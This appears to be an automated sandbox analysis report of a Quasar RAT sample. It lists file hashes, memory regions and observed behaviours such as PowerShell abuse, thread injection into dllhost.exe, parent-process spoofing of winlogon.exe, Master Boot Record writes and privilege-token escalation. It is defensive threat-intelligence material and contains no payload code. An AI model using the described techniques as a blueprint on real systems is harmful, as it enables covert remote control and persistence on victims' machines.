SHA1 ac880466fd99a5719fedc7289b00d78ba7088e06
SHA256 3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df
SHA512 b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

C:\Users\Admin\AppData\Roaming\Windows_Log_996.vbs

MD5 bc916bc3e65a6349e6da06ea86fefe42
SHA1 3a9c676f98f73276d6cfbfde73a647dd095985ef
SHA256 3fc742507c0f37a3842eb2e8e0be3d53344c8871c19faffc93fafb6d7d4ac83f
SHA512 b1364df2fb25828274bfbf3f32665ec981b49b1f91503e0d092b67e458046ad6f072861ccf556ce6a23e137b22eb909dd745e34f8ace6e3ff110c8ad0b402e30

C:\Users\Admin\AppData\Roaming\Windows_Log_996.bat

MD5 d4c582bb5890af020c110f2b1de1d9db
SHA1 04c25b115c7bdaced94746c4acf9b5245f064ea0
SHA256 d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c
SHA512 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 73d9a8b70cae57c62398e96a7c117046
SHA1 acf2d9217d48b6f6ad45dee99da628e5077edb49
SHA256 b81de9538e454141240747455f48d49d233647ffa197de238b8d356dedac7581
SHA512 6729c9ffa50c060afcf09cdb34615e7e1dc27a00c7fcfb5ec7e01e65e610427c39d36d8b12b54fd97e821e3cca033501457ae705867bfc7785732ea27b990eab

memory/4752-246-0x0000000073410000-0x0000000073AFE000-memory.dmp

memory/4384-277-0x000000000A140000-0x000000000A19E000-memory.dmp

memory/4384-278-0x000000000D160000-0x000000000D1F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 b489b7d9efc807fb9583f21f39327fc2
SHA1 1ee42e6c08cd0a51d5c763c6b8771c004b962865
SHA256 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579
SHA512 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e

memory/5052-291-0x000001F4A41A0000-0x000001F4A41C2000-memory.dmp

memory/5052-294-0x000001F4A42D0000-0x000001F4A4346000-memory.dmp

memory/4384-295-0x0000000006F10000-0x0000000006F22000-memory.dmp

memory/4384-307-0x000000000A240000-0x000000000A27E000-memory.dmp

memory/4384-313-0x000000000A2B0000-0x000000000A2BA000-memory.dmp

memory/5052-318-0x000001F4A4110000-0x000001F4A413A000-memory.dmp

memory/5052-320-0x00007FFABC5F0000-0x00007FFABC69E000-memory.dmp

memory/2788-324-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2788-323-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2788-322-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5052-319-0x00007FFABCC70000-0x00007FFABCE4B000-memory.dmp

memory/2788-329-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2788-331-0x00007FFABC5F0000-0x00007FFABC69E000-memory.dmp

memory/2788-321-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2788-330-0x00007FFABCC70000-0x00007FFABCE4B000-memory.dmp

memory/648-353-0x00007FFA7CD00000-0x00007FFA7CD10000-memory.dmp

memory/648-352-0x00000236B6700000-0x00000236B672A000-memory.dmp

memory/912-373-0x00007FFA7CD00000-0x00007FFA7CD10000-memory.dmp

memory/1016-383-0x00007FFA7CD00000-0x00007FFA7CD10000-memory.dmp

memory/1016-382-0x0000019EDF320000-0x0000019EDF34A000-memory.dmp

memory/1016-377-0x0000019EDF320000-0x0000019EDF34A000-memory.dmp

memory/912-372-0x000001AF2B860000-0x000001AF2B88A000-memory.dmp

memory/912-367-0x000001AF2B860000-0x000001AF2B88A000-memory.dmp

memory/736-363-0x00007FFA7CD00000-0x00007FFA7CD10000-memory.dmp

memory/736-362-0x0000023857DA0000-0x0000023857DCA000-memory.dmp

memory/736-357-0x0000023857DA0000-0x0000023857DCA000-memory.dmp

memory/648-347-0x00000236B6700000-0x00000236B672A000-memory.dmp

memory/564-343-0x00007FFA7CD00000-0x00007FFA7CD10000-memory.dmp

memory/564-342-0x00000293658A0000-0x00000293658CA000-memory.dmp

memory/564-337-0x00000293658A0000-0x00000293658CA000-memory.dmp

memory/564-336-0x00000293658A0000-0x00000293658CA000-memory.dmp

memory/564-335-0x0000029365870000-0x0000029365895000-memory.dmp

memory/2788-332-0x0000000140000000-0x0000000140008000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6Y0uWYpEdHGM.bat

MD5 dee3e1629613aac1425210215183ab08
SHA1 4c350b2021436178b4ef8a90a41dceff3ea5a1ac
SHA256 bdd9644f62784e3f04f03e4e914d54201d37fb147d6c68d7803e69b2237d8bc7
SHA512 b79a534b0b7496974c092de8116bc6f55af6c098cced8b8966d449d20f193a705ab673033de2e2df2b71240eaa39c8103b3dbad9b8890f006dbc65851f9be1c6

C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-11-~1

MD5 043e780a1f6a9b92980cfbf68c7f0ce9
SHA1 278f54259e76f7b23446d0772cfad526d27062ab
SHA256 ec2bd68d9cbcc3e32c025f318c39936e9d37ac5193bc7e91367f5600026cc76f
SHA512 023a1eec0515ab226ac97f1cc7a898b0473136f8a2dc38dd49be4ad9793bcfd4a9dd0051d8a18611e380acac439fcb7239e8f631100e9587bbd723565db260f1

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

MD5 efb2d2901c98c3e48c4d851d78e8d95c
SHA1 f3d926a6bcf4e9026799c3822875d12b576c5b7f
SHA256 107f6e6ab02e27b7ea604d31d15bbc494c3762750cb8c2094e3586e3dd23fc7d
SHA512 9a5f9725c3635767e2cb880a645a0d3e6211f97891121b5d3d417d24063f83ecedd219b97b205b12f18dfb56ca9e637ce61d22f3614b8d70e338447a45c4b0d2

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-11 17:38

Reported

2024-06-11 17:44

Platform

win10v2004-20240508-en

Max time kernel

300s

Max time network

51s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4916 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4916 set thread context of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
